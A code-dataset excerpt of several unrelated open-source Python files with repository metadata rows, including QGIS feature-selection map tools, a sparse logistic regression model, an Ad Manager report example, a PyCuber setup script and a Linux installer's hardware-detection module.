return numFeatures
def getFeatureForPoint(self, layer, startingPoint, inRing = False):
'''
return the feature this QPoint is in (polygon layer)
or this QPoint snaps to (point or line layer)
'''
result = []
if self.isPolygonLayer(layer):
mapToPixel = self.canvas.getCoordinateTransform()
#thisQgsPoint = mapToPixel.toMapCoordinates(startingPoint)
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
spatialIndex = dtutils.dtSpatialindex(layer)
featureIds = spatialIndex.nearestNeighbor(thisQgsPoint, 0)
# if we use 0 as neighborCount then only features that contain the point
# are included
for fid in featureIds:
feat = dtutils.dtGetFeatureForId(layer, fid)
if feat != None:
geom = QgsGeometry(feat.geometry())
if geom.contains(thisQgsPoint):
result.append(feat)
result.append([])
return result
break
else:
if inRing:
rings = dtutils.dtExtractRings(geom)
if len(rings) > 0:
for aRing in rings:
if aRing.contains(thisQgsPoint):
result.append(feat)
result.append([])
result.append(aRing)
return result
break
else:
#we need a snapper, so we use the MapCanvas snapper
snapper = self.canvas.snappingUtils()
snapper.setCurrentLayer(layer)
# snapType = 0: no snap, 1 = vertex, 2 vertex & segment, 3 = segment
snapMatch = snapper.snapToCurrentLayer(startingPoint, QgsPointLocator.All)
if not snapMatch.isValid():
dtutils.showSnapSettingsWarning(self.iface)
else:
feat = dtutils.dtGetFeatureForId(layer, snapMatch.featureId())
if feat != None:
result.append(feat)
if snapMatch.hasVertex():
result.append([snapMatch.point(), None])
if snapMatch.hasEdge():
result.append(snapMatch.edgePoints())
return result
return result
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
found = self.getFeatureForPoint(layer, startingPoint)
if len(found) > 0:
feat = found[0]
layer.removeSelection()
layer.select(feat.id())
self.featureSelected.emit([feat.id()])
class DtSelectPolygonTool(DtSelectFeatureTool):
def __init__(self, iface):
super().__init__(iface)
def getFeatureForPoint(self, layer, startingPoint):
'''
return the feature this QPoint is in and the total amount of features
'''
result = []
mapToPixel = self.canvas.getCoordinateTransform()
#thisQgsPoint = mapToPixel.toMapCoordinates(startingPoint)
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
spatialIndex = dtutils.dtSpatialindex(layer)
featureIds = spatialIndex.nearestNeighbor(thisQgsPoint, 0)
# if we use 0 as neighborCount then only features that contain the point
# are included
foundFeatures = []
while True:
for fid in featureIds:
if self.ignoreFids.count(fid) == 0:
feat = dtutils.dtGetFeatureForId(layer, fid)
if feat != None:
geom = QgsGeometry(feat.geometry())
if geom.contains(thisQgsPoint):
foundFeatures.append(feat)
if len(foundFeatures) == 0:
if len(self.ignoreFids) == 0: #there is no feaure at this point
break #while
else:
self.ignoreFids.pop(0) # remove first and try again
elif len(foundFeatures) > 0: # return first feature
feat = foundFeatures[0]
result.append(feat)
result.append(len(featureIds))
break #while
return result
def canvasReleaseEvent(self,event):
'''
- if user clicks left and no feature is highlighted, highlight first feature
- if user clicks left and there is a highlighted feature use this feature as selected
- if user clicks right, highlight another feature
'''
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
startingPoint = QtCore.QPoint(x,y)
#the clicked point is our starting point
if event.button() == QtCore.Qt.RightButton: # choose another feature
self.highlightNext(layer, startingPoint)
elif event.button() == QtCore.Qt.LeftButton:
if self.currentHighlight == [None, None]: # first click
numFeatures = self.highlightNext(layer, startingPoint)
else: # user accepts highlighted geometry
mapToPixel = self.canvas.getCoordinateTransform()
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
feat = self.currentHighlight[0]
if feat.geometry().contains(thisQgsPoint): # is point in highlighted feature?
numFeatures = 1
else: # mabe user clicked somewhere else
numFeatures = self.highlightNext(layer, startingPoint)
if numFeatures == 1:
feat = self.currentHighlight[0]
self.removeHighlight()
layer.removeSelection()
layer.select(feat.id())
self.featureSelected.emit([feat.id()])
def reset(self):
self.removeHighlight()
class DtSelectRingTool(DtSelectFeatureTool):
'''
a map tool to select a ring in a polygon
'''
ringSelected = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
found = self.getFeatureForPoint(layer, startingPoint, inRing = True)
if len(found) == 3:
aRing = found[2]
self.ringSelected.emit([aRing])
def reset(self, emitSignal = False):
pass
class DtSelectGapTool(DtMapToolEdit):
'''
a map tool to select a gap between polygons, if allLayers
is True then the gap is searched between polygons of
all currently visible polygon layers
'''
gapSelected = QtCore.pyqtSignal(list)
def __init__(self, iface, allLayers):
super().__init__(iface)
self.allLayers = allLayers
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
visibleLayers = []
if self.allLayers:
for aLayer in self.iface.layerTreeCanvasBridge().rootGroup().checkedLayers():
if 0 == aLayer.type():
if self.isPolygonLayer(aLayer):
visibleLayers.append(aLayer)
else:
if layer != None:
visibleLayers.append(layer)
if len(visibleLayers) > 0:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
mapToPixel = self.canvas.getCoordinateTransform()
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
multiGeom = None
for aLayer in visibleLayers:
if not self.allLayers and aLayer.selectedFeatureCount() > 0:
#we assume, that the gap is between the selected polyons
hadSelection = True
else:
hadSelection = False
spatialIndex = dtutils.dtSpatialindex(aLayer)
# get the 100 closest Features
featureIds = spatialIndex.nearestNeighbor(thisQgsPoint, 100)
aLayer.select(featureIds)
multiGeom = dtutils.dtCombineSelectedPolygons(aLayer, self.iface, multiGeom)
if self.allLayers or not hadSelection:
aLayer.removeSelection()
if multiGeom == None:
return None
if multiGeom != None:
rings = dtutils.dtExtractRings(multiGeom)
if len(rings) > 0:
for aRing in rings:
if aRing.contains(thisQgsPoint):
self.gapSelected.emit([aRing])
break
def reset(self, emitSignal = False):
pass
class DtSelectPartTool(DtSelectFeatureTool):
'''signal sends featureId of clickedd feature, number of part selected and geometry of part'''
partSelected = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
found = self.getFeatureForPoint(layer, startingPoint)
if len(found) > 0:
feat = found[0]
snappedPoints = found[1]
if len(snappedPoints) > 0:
snappedVertex = snappedPoints[0]
else:
snappedVertex = None
geom = QgsGeometry(feat.geometry())
# if feature geometry is multipart start split processing
if geom.isMultipart():
# Get parts from original feature
parts = geom.asGeometryCollection()
mapToPixel = self.canvas.getCoordinateTransform()
thisQgsPoint = mapToPixel.toMapCoordinates(startingPoint)
for i in range(len(parts)):
# find the part that was snapped
aPart = parts[i]
if self.isPolygonLayer(layer):
if aPart.contains(thisQgsPoint):
self.partSelected.emit([feat.id(), i, aPart])
break
else:
points = dtutils.dtExtractPoints(aPart)
for j in range(len(points)):
aPoint = points[j]
if snappedVertex != None:
if aPoint.x() == snappedVertex.x() and \
aPoint.y() == snappedVertex.y():
self.partSelected.emit([feat.id(), i, aPart])
break
else:
try:
nextPoint = points[j + 1]
except:
break
if aPoint.x() == snappedPoints[0].x() and \
aPoint.y() == snappedPoints[0].y() and \
nextPoint.x() == snappedPoints[1].x() and \
nextPoint.y() == snappedPoints[1].y():
self.partSelected.emit([feat.id(), i, aPart])
break
class DtSelectVertexTool(DtMapToolEdit):
'''select and mark numVertices vertices in the active layer'''
vertexFound = QtCore.pyqtSignal(list)
def __init__(self, iface, numVertices = 1):
super().__init__(iface)
# desired number of marked vertex until signal
self.numVertices = numVertices
# number of marked vertex
self.count = 0
# arrays to hold markers and vertex points
self.markers = []
self.points = []
self.fids = []
def canvasReleaseEvent(self,event):
if self.count < self.numVertices: #not yet enough
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
#we need a snapper, so we use the MapCanvas snapper
snapper = self.canvas.snappingUtils()
snapper.setCurrentLayer(layer)
# snapType = 0: no snap, 1 = vertex, 2 = segment, 3 = vertex & segment
snapMatch = snapper.snapToCurrentLayer(startingPoint, QgsPointLocator.Vertex)
if not snapMatch.isValid():
#warn about missing snapping tolerance if appropriate
dtutils.showSnapSettingsWarning(self.iface)
else:
#mark the vertex
p = snapMatch.point()
m = QgsVertexMarker(self.canvas)
m.setIconType(1)
if self.count == 0:
m.setColor(QtGui.QColor(255,0,0))
else:
m.setColor(QtGui.QColor(0, 0, 255))
m.setIconSize(12)
m.setPenWidth (3)
m.setCenter(p)
self.points.append(p)
self.markers.append(m)
fid = snapMatch.featureId() # QgsFeatureId of the snapped geometry
self.fids.append(fid)
self.count += 1
if self.count == self.numVertices:
self.vertexFound.emit([self.points, self.markers, self.fids])
#self.emit(SIGNAL("vertexFound(PyQt_PyObject)"), [self.points, self.markers])
def reset(self, emitSignal = False):
for m in self.markers:
self.canvas.scene().removeItem(m)
self.markers = []
self.points = []
self.fids = []
self.count = 0
class DtSelectSegmentTool(DtMapToolEdit):
segmentFound = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
self.rb1 = QgsRubberBand(self.canvas, False)
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
#we need a snapper, so we use the MapCanvas snapper
snapper = self.canvas.snappingUtils()
snapper.setCurrentLayer(layer)
# snapType = 0: no snap, 1 = vertex, 2 = segment, 3 = vertex & segment
snapType = 2
snapMatch = snapper.snapToCurrentLayer(startingPoint, QgsPointLocator.Edge)
if not snapMatch.isValid():
#warn about missing snapping tolerance if appropriate
dtutils.showSnapSettingsWarning(self.iface)
else:
#if we have found a linesegment
edge = snapMatch.edgePoints()
p1 = edge[0]
p2 = edge[1]
# we like to mark the segment that is choosen, so we need a rubberband
self.rb1.reset()
color = QtGui.QColor(255,0,0)
self.rb1.setColor(color)
self.rb1.setWidth(2)
self.rb1.addPoint(p1)
self.rb1.addPoint(p2)
self.rb1.show()
self.segmentFound.emit([self.rb1.getPoint(0, 0), self.rb1.getPoint(0, 1), self.rb1])
def reset(self, emitSignal = False):
self.rb1.reset()
class DtSplitFeatureTool(QgsMapToolAdvancedDigitizing, DtTool):
finishedDigitizing = QtCore.pyqtSignal(QgsGeometry)
def __init__(self, iface):
super().__init__(canvas = iface.mapCanvas(), cadDockWidget = iface.cadDockWidget(),
iface = iface, geometryTypes = [])
self.marker = None
self.rubberBand = None
self.sketchRubberBand = self.createRubberBand()
self.sketchRubberBand.setLineStyle(QtCore.Qt.DotLine)
self.rbPoints = [] # array to store points in rubber band because
# api to access points does not work properly or I did not figure it out :)
self.currentMousePosition = None
self.snapPoint = None
self.reset()
def activate(self):
super().activate()
self.canvas.setCursor(self.cursor)
self.canvas.installEventFilter(self)
self.snapPoint = None
self.rbPoints = []
def eventFilter(self, source, event):
'''
we need an eventFilter here to filter out Backspace key presses
as otherwise the selected objects in the edit layer get deleted
if user hits Backspace
The eventFilter() function must return true if the event should be filtered,
(i.e. stopped); otherwise it must return false, see
http://doc.qt.io/qt-5/qobject.html#installEventFilter
'''
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Backspace:
if self.rubberBand != None:
if self.rubberBand.numberOfVertices() >= 2: # QgsRubberBand has always 2 vertices
if self.currentMousePosition != None:
self.removeLastPoint()
self.redrawSketchRubberBand([self.toMapCoordinates(self.currentMousePosition)])
return True
else:
return False
else:
return False
def eventToQPoint(self, event):
x = event.pos().x()
y = event.pos().y()
thisPoint = QtCore.QPoint(x, y)
return thisPoint
def initRubberBand(self, firstPoint):
if self.rubberBand == None:
# create a QgsRubberBand
self.rubberBand = self.createRubberBand()
self.rubberBand.addPoint(firstPoint)
self.rbPoints.append(firstPoint)
def removeLastPoint(self):
''' remove the last point in self.rubberBand'''
if len (self.rbPoints) > 1: #first point will not be removed
self.rbPoints.pop()
#we recreate rubberBand because it contains doubles
self.rubberBand.reset()
for aPoint in self.rbPoints:
self.rubberBand.addPoint(QgsPointXY(aPoint))
def trySnap(self, event):
self.removeSnapMarker()
self.snapPoint = None
# try to snap
thisPoint = self.eventToQPoint(event)
snapper = self.canvas.snappingUtils()
# snap to any layer within snap tolerance
snapMatch = snapper.snapToMap(thisPoint)
if not snapMatch.isValid():
return False
else:
self.snapPoint = snapMatch.point()
self.markSnap(self.snapPoint)
return True
def markSnap(self, thisPoint):
self.marker = QgsVertexMarker(self.canvas)
self.marker.setIconType(1)
self.marker.setColor(QtGui.QColor(255,0,0))
self.marker.setIconSize(12)
self.marker.setPenWidth (3)
self.marker.setCenter(thisPoint)
def removeSnapMarker(self):
if self.marker != None:
self.canvas.scene().removeItem(self.marker)
self.marker = None
def clear(self):
if self.rubberBand != None:
self.rubberBand.reset()
self.canvas.scene().removeItem(self.rubberBand)
self.rubberBand = None
if self.snapPoint != None:
self.removeSnapMarker()
self.snapPoint = None
self.sketchRubberBand.reset()
self.rbPoints = []
def reset(self):
self.clear()
self.canvas.removeEventFilter(self)
def redrawSketchRubberBand(self, points):
if self.rubberBand != None and len(self.rbPoints) > 0:
self.sketchRubberBand.reset()
sketchStartPoint = self.rbPoints[len(self.rbPoints) -1]
self.sketchRubberBand.addPoint(QgsPointXY(sketchStartPoint))
if len(points) == 1:
self.sketchRubberBand.addPoint(QgsPointXY(sketchStartPoint))
self.sketchRubberBand.movePoint(
self.sketchRubberBand.numberOfVertices() -1, points[0])
#for p in range(self.rubberBand.size()):
# self.debug("Part " + str(p))
# for v in range(self.rubberBand.partSize(p)):
# vertex = self.rubberBand.getPoint(0,j=v)
# self.debug("Vertex " + str(v) + " = "+ str(vertex.x()) + ", " + str(vertex.y()))
#startPoint = self.rubberBand.getPoint(0, self.rubberBand.partSize(0) -1)
#self.debug("StartPoint " + str(startPoint))
#self.sketchRubberBand.addPoint(startPoint)
#self.sketchRubberBand.addPoint(points[len(points) - 1])
else:
for aPoint in points:
self.sketchRubberBand.addPoint(aPoint)
def cadCanvasMoveEvent(self, event):
pass
#self.debug("cadCanvasMoveEvent")
def cadCanvasPressEvent(self, event):
pass
#self.debug("cadCanvasPressEvent")
def cadCanvasReleaseEvent(self, event):
pass
#self.debug("cadCanvasReleaseEvent")
def canvasMoveEvent(self, event):
self.snapPoint = None
thisPoint = self.eventToQPoint(event)
hasSnap = self.trySnap(event)
if self.rubberBand != None:
if hasSnap:
#if self.canvas.snappingUtils().config().enabled(): # is snapping active?
tracer = QgsMapCanvasTracer.tracerForCanvas(self.canvas)
if tracer.actionEnableTracing().isChecked(): # tracing is pressed in
tracer.configure()
#startPoint = self.rubberBand.getPoint(0, self.rubberBand.numberOfVertices() -1)
startPoint = self.rbPoints[len(self.rbPoints) -1]
pathPoints, pathError = tracer.findShortestPath(QgsPointXY(startPoint), self.snapPoint)
if pathError == 0: #ErrNone
pathPoints.pop(0) # remove first point as it is identical with starPoint
self.redrawSketchRubberBand(pathPoints)
else:
self.redrawSketchRubberBand([self.snapPoint])
else:
self.redrawSketchRubberBand([self.snapPoint])
else:
self.redrawSketchRubberBand([self.toMapCoordinates(thisPoint)])
self.currentMousePosition = thisPoint
def canvasReleaseEvent(self, event):
layer = self.canvas.currentLayer()
if layer != None:
thisPoint = self.eventToQPoint(event)
#QgsMapToPixel instance
if event.button() == QtCore.Qt.LeftButton:
if self.rubberBand == None:
if self.snapPoint == None:
self.initRubberBand(self.toMapCoordinates(thisPoint))
else: # last mouse move created a snap
self.initRubberBand(self.snapPoint)
self.snapPoint = None
self.removeSnapMarker()
else: # merge sketchRubberBand into rubberBand
sketchGeom = self.sketchRubberBand.asGeometry()
verticesSketchGeom = sketchGeom.vertices()
self.rubberBand.addGeometry(sketchGeom)
# rubberBand now contains a double point because it's former end point
# and sketchRubberBand's start point are identical
# so we remove the last point before adding new ones
self.rbPoints.pop()
while verticesSketchGeom.hasNext():
# add the new points
self.rbPoints.append(verticesSketchGeom.next())
self.redrawSketchRubberBand([self.toMapCoordinates(thisPoint)])
if self.snapPoint != None:
self.snapPoint = None
self.removeSnapMarker()
else: # right click
if self.rubberBand.numberOfVertices() > 1:
rbGeom = self.rubberBand.asGeometry()
self.finishedDigitizing.emit(rbGeom)
self.clear()
self.canvas.refresh()
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Escape:
self.clear()
def deactivate(self):
self.reset()
|
gpl-2.0
| -5,751,604,370,468,592,000
| 38.091052
| 146
| 0.555741
| false
| 4.384751
| false
| false
| false
|
HazyResearch/metal
|
metal/contrib/baselines/sparse_logreg.py
|
1
|
1109
|
from metal.contrib.modules.sparse_linear_module import SparseLinearModule
from metal.end_model import EndModel
from metal.utils import recursive_merge_dicts
class SparseLogisticRegression(EndModel):
"""A _sparse_ logistic regression classifier for a single-task problem
Args:
input_dim: The maximum length of each input (a tensor of integer
indices corresponding to one-hot features)
output_dim: The cardinality of the classifier
padding_idx: If not None, the embedding initialized to 0 so no gradient
will pass through it.
"""
def __init__(self, input_dim, output_dim=2, padding_idx=0, **kwargs):
layer_out_dims = [input_dim, output_dim]
sparse_linear = SparseLinearModule(
vocab_size=input_dim, embed_size=output_dim, padding_idx=padding_idx
)
overrides = {"input_batchnorm": False, "input_dropout": 0.0}
kwargs = recursive_merge_dicts(
kwargs, overrides, misses="insert", verbose=False
)
super().__init__(layer_out_dims, head_module=sparse_linear, **kwargs)
|
apache-2.0
| -7,200,890,425,346,443,000
| 41.653846
| 80
| 0.672678
| false
| 4.062271
| false
| false
| false
|
katerina7479/kadre
|
view/pages/tableboxpage.py
|
1
|
3165
|
from PySide import QtGui
from pages import Page
from view.widgets.buttonvbox import ButtonVBox
from view.widgets.tablebox import TableBox
class TableBoxPage(Page):
def __init__(self, parent, name):
super(TableBoxPage, self).__init__(parent, name)
def _setup(self):
self.headerlabeltext = "This is my TableBoxPage"
self.ctext = "Subheader 1"
self.ptext = "Subheader 2"
self.buttonlist = [
{"type": "button", "text": "Add",
"callback": self.on_add},
{"type": "button", "text": "Edit",
"callback": self.on_edit},
{"type": "button", "text": "Delete",
"callback": self.on_del}]
# Usually get datalist from the database
self.datalist = [{"id": 1, "name": "TestName", "desc": "TestDesc", "date": "02MAR13"}]
self.collist = [{"column": "name", "title": "Name"},
{"column": "desc", "title": "Description"},
{"column": "date", "title": "Date"}
]
def _header(self):
self.hlabel = QtGui.QLabel(
"<font size=16 align='center'>%s</font>" % self.headerlabeltext)
hbox = QtGui.QHBoxLayout()
hbox.addStretch(1)
hbox.addWidget(self.hlabel)
hbox.addStretch(1)
self.dashcheck = QtGui.QCheckBox()
self.dashcheck.setChecked(True)
self.dashcheck.stateChanged.connect(self.on_dash)
hbox.addWidget(self.dashcheck)
hbox.addWidget(QtGui.QLabel("My Check Box"))
self.layout.addLayout(hbox)
self.clabel = QtGui.QLabel(self.ctext)
self.plabel = QtGui.QLabel(self.ptext)
hbox2 = QtGui.QHBoxLayout()
hbox2.addStretch(1)
hbox2.addWidget(self.clabel)
hbox2.addStretch(1)
hbox2.addWidget(self.plabel)
hbox2.addStretch(1)
self.layout.addLayout(hbox2)
self.layout.addStretch(1)
def _center(self):
self.layout.addWidget(QtGui.QLabel("TableBox: "))
hbox = QtGui.QHBoxLayout()
vbox = ButtonVBox(self.buttonlist)
hbox.addLayout(vbox)
self.tablebox = TableBox(self.datalist, self.collist, self.on_edit)
hbox.addWidget(self.tablebox)
self.layout.addLayout(hbox)
self.layout.addStretch(1)
def _refreshbox(self):
#self.datalist = from the database
#self.tablebox.Update(self.datalist)
pass
def _footer(self):
self.layout.addStretch(1)
def refresh(self):
self._setup()
self._refreshbox()
self.show()
def on_add(self):
# Do Stuff to add to database, and refresh (like make a dialog popup)
self._refreshbox()
def on_edit(self):
myid = self.tablebox.Get()
print myid # Dialog for editing
self._refreshbox()
def on_del(self):
myid = self.tablebox.Get()
print "Deleting %s" % myid # Delete from database
# self.tablebox.DeleteCurrent()
self._refreshbox()
def on_dash(self):
self.dashboard = self.dashcheck.isChecked()
print self.dashboard
|
mit
| 9,157,603,631,712,562,000
| 29.432692
| 94
| 0.578831
| false
| 3.732311
| false
| false
| false
|
googleads/googleads-python-lib
|
examples/ad_manager/v202105/report_service/run_ad_exchange_report.py
|
1
|
2145
|
#!/usr/bin/env python
#
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs a report on Ad Exchange data via the Ad Manager API."""
import tempfile
# Import appropriate modules from the client library.
from googleads import ad_manager
from googleads import errors
def main(client):
# Initialize a DataDownloader.
report_downloader = client.GetDataDownloader(version='v202105')
# Create report job.
report_job = {
'reportQuery': {
'dimensions': ['AD_EXCHANGE_DATE', 'AD_EXCHANGE_COUNTRY_NAME'],
'columns': ['AD_EXCHANGE_AD_REQUESTS', 'AD_EXCHANGE_IMPRESSIONS',
'AD_EXCHANGE_ESTIMATED_REVENUE'],
'dateRangeType': 'LAST_WEEK',
'timeZoneType': 'AD_EXCHANGE', # Run in pacific time
'adxReportCurrency': 'EUR'
}
}
try:
# Run the report and wait for it to finish.
report_job_id = report_downloader.WaitForReport(report_job)
except errors.AdManagerReportError as e:
print('Failed to generate report. Error was: %s' % e)
# Change to your preferred export format.
export_format = 'CSV_DUMP'
report_file = tempfile.NamedTemporaryFile(suffix='.csv.gz', delete=False)
# Download report data.
report_downloader.DownloadReportToFile(
report_job_id, export_format, report_file)
report_file.close()
# Display results.
print('Report job with id "%s" downloaded to:\n%s' % (
report_job_id, report_file.name))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
|
apache-2.0
| 3,438,026,921,193,039,000
| 31.5
| 75
| 0.697902
| false
| 3.756567
| false
| false
| false
|
javiercantero/streamlink
|
tests/resources/__init__.py
|
1
|
1277
|
import codecs
import os.path
import six
from io import BytesIO
try:
import xml.etree.cElementTree as ET
except ImportError: # pragma: no cover
import xml.etree.ElementTree as ET
from contextlib import contextmanager
__here__ = os.path.abspath(os.path.dirname(__file__))
def _parse_xml(data, strip_ns=False):
if six.PY2 and isinstance(data, six.text_type):
data = data.encode("utf8")
elif six.PY3:
data = bytearray(data, "utf8")
try:
it = ET.iterparse(BytesIO(data))
for _, el in it:
if '}' in el.tag and strip_ns:
# strip all namespaces
el.tag = el.tag.split('}', 1)[1]
return it.root
except Exception as err:
snippet = repr(data)
if len(snippet) > 35:
snippet = snippet[:35] + " ..."
raise ValueError("Unable to parse XML: {0} ({1})".format(err, snippet))
@contextmanager
def text(path, encoding="utf8"):
with codecs.open(os.path.join(__here__, path), 'r', encoding=encoding) as resource_fh:
yield resource_fh
@contextmanager
def xml(path, encoding="utf8"):
with codecs.open(os.path.join(__here__, path), 'r', encoding=encoding) as resource_fh:
yield _parse_xml(resource_fh.read(), strip_ns=True)
|
bsd-2-clause
| 8,025,877,989,472,806,000
| 27.377778
| 90
| 0.617071
| false
| 3.557103
| false
| false
| false
|
adrianliaw/PyCuber
|
setup.py
|
1
|
2055
|
from setuptools import setup
import pycuber as pc
long_desc = """
PyCuber
=======
PyCuber is a Rubik's Cube package in Python 2/3.
--------------------------------------------------
The cube can be revealed as expanded view in the terminal, so it's easy
to visualise the cube, just inside the terminal. (Not tested on Windows)
.. code-block:: python
>>> import pycuber as pc
>>> # Create a Cube object
>>> mycube = pc.Cube()
>>> # Do something at the cube.
>>> mycube("R U R' U'")
>>> print(mycube)
.. image:: http://i.imgur.com/OI4kbn7.png
We also provided some useful tools to deal with Rubik's Cube formulae.
.. code-block:: python
>>> import pycuber as pc
>>> # Create a Formula object
>>> my_formula = pc.Formula("R U R' U' R' F R2 U' R' U' R U R' F'")
>>> # Reversing a Formula
>>> my_formula.reverse()
>>> print(my_formula)
>>> # Mirroring a Formula
>>> myalg.mirror("LR")
>>> print(my_formula)
F R U' R' U R U R2 F' R U R U' R'
F' L' U L U' L' U' L2 F L' U' L' U L
I'll add some documentations later."""
setup(
name = "pycuber",
version = pc.__version__,
description = "Rubik's Cube in Python",
long_description = long_desc,
url = "http://github.com/adrianliaw/PyCuber",
license = "MIT",
author = "Adrian Liaw",
author_email = "adrianliaw2000@gmail.com",
keywords = ["Rubik's Cube", "rubik", "cube", "solver"],
packages = ["pycuber", "pycuber.solver", "pycuber.solver.cfop"],
package_dir = {"pycuber":"pycuber"},
classifiers = [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Mathematics",
],
package_data = {
"pycuber.solver.cfop": ["*.csv"],
},
)
|
mit
| 7,480,977,375,062,680,000
| 25.346154
| 72
| 0.56545
| false
| 3.419301
| false
| true
| false
|
Wyn10/Cnchi
|
cnchi/hardware/hardware.py
|
1
|
14779
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hardware.py
#
# Copyright © 2013-2016 Antergos
#
# This file is part of Cnchi.
#
# Cnchi is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Cnchi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# The following additional terms are in effect as per Section 7 of the license:
#
# The preservation of all legal notices and author attributions in
# the material or in the Appropriate Legal Notices displayed
# by works containing it is required.
#
# You should have received a copy of the GNU General Public License
# along with Cnchi; If not, see <http://www.gnu.org/licenses/>.
""" Hardware related packages installation """
import logging
import os
import subprocess
_HARDWARE_PATH = '/usr/share/cnchi/cnchi/hardware'
class Hardware(object):
""" This is an abstract class. You need to use this as base """
def __init__(self, class_name=None, class_id=None, vendor_id=None,
devices=None, priority=-1, enabled=True):
self.class_name = class_name
self.class_id = class_id
self.vendor_id = vendor_id
self.devices = devices
self.priority = priority
self.enabled = enabled
self.product_id = ""
def get_packages(self):
""" Returns all necessary packages to install """
raise NotImplementedError("get_packages is not implemented")
@staticmethod
def get_conflicts():
""" Returns a list with all conflicting packages """
return []
def post_install(self, dest_dir):
""" This method runs commands that need to be run AFTER installing the driver """
pass
def pre_install(self, dest_dir):
""" This method runs commands that need to run BEFORE installing the driver """
pass
def check_device(self, class_id, vendor_id, product_id):
""" Checks if the driver supports this device """
if not self.enabled:
return False
if self.class_id and class_id != self.class_id:
return False
if self.vendor_id and vendor_id != self.vendor_id:
return False
if self.devices and product_id not in self.devices:
return False
return True
def detect(self):
""" Tries to guess if a device suitable for this driver is present,
used in features screen """
if not self.enabled:
return False
# Get PCI devices
try:
cmd = ["lspci", "-n"]
lines = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
lines = lines.decode().split("\n")
except subprocess.CalledProcessError as err:
logging.warning("Cannot detect hardware components : %s", err.output.decode())
return False
for line in lines:
if len(line) > 0:
class_id = "0x{0}".format(line.split()[1].rstrip(":")[0:2])
if class_id == self.class_id:
dev = line.split()[2].split(":")
vendor_id = "0x{0}".format(dev[0])
product_id = "0x{0}".format(dev[1])
if vendor_id == self.vendor_id and product_id in self.devices:
return True
return False
@staticmethod
def is_proprietary():
""" Proprietary drivers are drivers for your hardware devices
that are not freely-available or open source, and must be
obtained from the hardware manufacturer. """
return False
def is_graphic_driver(self):
""" Tells us if this is a graphic driver or not """
if self.class_id == "0x03":
return True
else:
return False
def get_name(self):
""" Returns class name """
return self.class_name
def get_priority(self):
""" Get module (driver) priority """
return self.priority
@staticmethod
def chroot(cmd, dest_dir, stdin=None, stdout=None):
""" Runs command inside the chroot """
run = ['chroot', dest_dir]
for element in cmd:
run.append(element)
try:
proc = subprocess.Popen(run,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out = proc.communicate()[0]
logging.debug(out.decode())
except OSError as err:
logging.error("Error running command: %s", err.strerror)
def __str__(self):
return "class name: {0}, class id: {1}, vendor id: {2}, product id: {3}".format(
self.class_name,
self.class_id,
self.vendor_id,
self.product_id)
def call_script(self, script_path, dest_dir):
""" Helper function that will run a script """
if os.path.exists(script_path):
cmd = [
"/usr/bin/bash",
script_path,
dest_dir,
self.class_name]
try:
subprocess.check_output(cmd, timeout=300)
logging.debug("Script '%s' completed successfully.", script_path)
except subprocess.CalledProcessError as err:
# Even though Post-install script call has failed we
# will try to continue with the installation.
logging.error(
"Error running %s script, command %s failed: %s",
script_path,
err.cmd,
err.output)
except subprocess.TimeoutExpired as timeout_error:
logging.error(timeout_error)
class HardwareInstall(object):
""" This class checks user's hardware
If 'use_proprietary_graphic_drivers' is True, this module will try to
install the proprietary variants of the graphic drivers available
(only if the hardware is detected). For non graphical drivers,
the open one is always choosen as default.
"""
def __init__(self, use_proprietary_graphic_drivers=False):
self.use_proprietary_graphic_drivers = use_proprietary_graphic_drivers
# All available objects
self.all_objects = []
# All objects that support devices found
